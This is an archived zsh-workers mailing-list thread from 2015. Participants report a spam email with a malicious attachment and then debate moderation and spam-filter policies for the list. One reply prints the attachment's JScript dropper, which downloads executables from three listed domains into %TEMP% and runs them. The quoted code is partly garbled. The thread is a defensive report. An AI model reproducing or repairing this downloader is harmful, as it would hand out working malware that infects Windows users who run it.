zsh-workers/37266 has a malicious attachment

zsh-workers/37266 has a malicious attachment

[Peter Stephenson]

...probably obvious enough to everyone here, but as it got flagged up by
our email system I thought it was worth reporting more widely.
Subject line is "Your e-ticket #0000228935".

pws

Re: zsh-workers/37266 has a malicious attachment

[Markus Trippelsdorf]

On 2015.12.01 at 12:24 +0000, Peter Stephenson wrote:
> ...probably obvious enough to everyone here, but as it got flagged up by
> our email system I thought it was worth reporting more widely.
> Subject line is "Your e-ticket #0000228935".

Only Windows users are attacked. Here is the code:

var b = "itechgalaxyapps.com mybeautypedia.com kindernestmumbai.com".split(" ");
var ws = WScript.CreateObject("WScript.Shell");
var fn = ws.ExpandEnvironmentStrings("%TEMP%") + String.fromCharCode(92) + "750083";
var xo = WScript.CreateObject("MSXML2.XMLHTTP");
var xa = WScript.CreateObject("ADODB.Stream");
var ld = 0;
for (var n = 1; n <= 3; n++) {
    for (var i = ld; i 1000) {
        dn = 1;
        xa.position = 0;
        xa.saveToFile(fn + n + ".exe", 2);
        try {
            ws.Run(fn + n + ".exe", 1, 0);
        } catch (er) {};
    };
    xa.close();
};
if (dn == 1) {
    ld = i;
    break;
};
} catch (er) {};
};
};

-- 
Markus

Re: zsh-workers/37266 has a malicious attachment

[Bart Schaefer]

On Dec 1, 12:24pm, Peter Stephenson wrote:
}
} ...probably obvious enough to everyone here, but as it got flagged up by
} our email system I thought it was worth reporting more widely.
} Subject line is "Your e-ticket #0000228935".

The number of spam/malicious messages making it to the list has been
slowly creeping up the last several months.  We may have to consider
closing zsh-workers to non-subscribers.

Curiously zsh-users doesn't seem to have the same problem (yet), so if
we can close -workers while still allowing the cross-posting, we won't
lose much.

Or maybe non-member posts could require approval, as with -announce.

-- 
Barton E. Schaefer

Re: zsh-workers/37266 has a malicious attachment

[ZyX]

01.12.2015, 21:12, "Bart Schaefer" <schaefer@brasslantern.com>:
> On Dec 1, 12:24pm, Peter Stephenson wrote:
> }
> } ...probably obvious enough to everyone here, but as it got flagged up by
> } our email system I thought it was worth reporting more widely.
> } Subject line is "Your e-ticket #0000228935".
>
> The number of spam/malicious messages making it to the list has been
> slowly creeping up the last several months. We may have to consider
> closing zsh-workers to non-subscribers.
>
> Curiously zsh-users doesn't seem to have the same problem (yet), so if
> we can close -workers while still allowing the cross-posting, we won't
> lose much.
>
> Or maybe non-member posts could require approval, as with -announce.

vim* lists uses google groups and moderation for new members and I almost never see spam there. Most likely though this is the result of the following combination:

1. Google anti-spam algorythms.
2. Requirement to have Google account to become a member (not necessary Google mail though).
3. Denied non-member posting.
4. Presence of pre-moderation for all members that write posts for the first time.

Fourth should be the most effective. I mean, has the least number of false negatives and positives (“positive” is “spam” marker), though only as long as you do not consider denying non-member posts as adding false positives.

>
> --
> Barton E. Schaefer

Re: zsh-workers/37266 has a malicious attachment

[Axel Beckert]

Hi,

On Tue, Dec 01, 2015 at 11:33:19PM +0300, ZyX wrote:
> 01.12.2015, 21:12, "Bart Schaefer" <schaefer@brasslantern.com>:
> > On Dec 1, 12:24pm, Peter Stephenson wrote:
> > } ...probably obvious enough to everyone here, but as it got flagged up by
> > } our email system I thought it was worth reporting more widely.

Well, it got flagged as spam here, too. So IMHO the chances are rather
high that other's spam filters caught it, too. I actually don't care
about Spam on mailing lists. It's spam after all and gets filtered
here locally as direct spam, too.

> > The number of spam/malicious messages making it to the list has been
> > slowly creeping up the last several months. We may have to consider
> > closing zsh-workers to non-subscribers.

That would hinder bug reports a lot.

> > Or maybe non-member posts could require approval, as with
> > -announce.

That's much better.

> vim* lists uses google groups and moderation for new members and I
> almost never see spam there.

Nevertheless using Google Groups as a mailing list has tons of other
issues. IMHO it's by far not worth to drop a proper and working ML for
crappy Google Groups. And you don't know how long they will exist.
Just think about Google Wave, Google Reader and all the other nice
services they already closed down.

Besides the nice X-Seq feature is surely not available on Google
Groups.

> 4. Presence of pre-moderation for all members that write posts for
> the first time.

That's also a viable solution IMHO.

		Kind regards, Axel
-- 
/~\  Plain Text Ribbon Campaign                   | Axel Beckert
\ /  Say No to HTML in E-Mail and News            | abe@deuxchevaux.org  (Mail)
 X   See http://www.nonhtmlmail.org/campaign.html | abe@noone.org (Mail+Jabber)
/ \  I love long mails: http://email.is-not-s.ms/ | http://abe.noone.org/ (Web)

Re: zsh-workers/37266 has a malicious attachment

[Daniel Shahaf]

Axel Beckert wrote on Wed, Dec 02, 2015 at 01:21:20 +0100:
> On Tue, Dec 01, 2015 at 11:33:19PM +0300, ZyX wrote:
> > 01.12.2015, 21:12, "Bart Schaefer" <schaefer@brasslantern.com>:
> > > On Dec 1, 12:24pm, Peter Stephenson wrote:
> > > Or maybe non-member posts could require approval, as with
> > > -announce.
> 
> That's much better.
> 

Apache lists permit posts by non-subscribers but require the first post
by a non-subscribed address to be manually approved.  (Subsequent posts
do not require approval.)  I think I only ever saw one false negative
there.  The only effect to posters is a delay the first time they post.

They implement that policy through 'ezmlm-make -+ -m -u'.

> > vim* lists uses google groups and moderation for new members and I
> > almost never see spam there.
> 
> Nevertheless using Google Groups as a mailing list has tons of other
> issues. IMHO it's by far not worth to drop a proper and working ML for
> crappy Google Groups. And you don't know how long they will exist.
> Just think about Google Wave, Google Reader and all the other nice
> services they already closed down.
> 
> Besides the nice X-Seq feature is surely not available on Google
> Groups.
> 

+1

Re: zsh-workers/37266 has a malicious attachment

[Vincent Lefevre]

On 2015-12-02 00:35:18 +0000, Daniel Shahaf wrote:
> Apache lists permit posts by non-subscribers but require the first post
> by a non-subscribed address to be manually approved.  (Subsequent posts
> do not require approval.)  I think I only ever saw one false negative
> there.  The only effect to posters is a delay the first time they post.

Or, alternatively, how about a strong spam filter where members
would be whitelisted?

The spam filter could do:

  spam -> rejected
  maybe-spam -> moderated
  not-spam -> accepted

-- 
Vincent Lefèvre <vincent@vinc17.net> - Web: <https://www.vinc17.net/>
100% accessible validated (X)HTML - Blog: <https://www.vinc17.net/blog/>
Work: CR INRIA - computer arithmetic / AriC project (LIP, ENS-Lyon)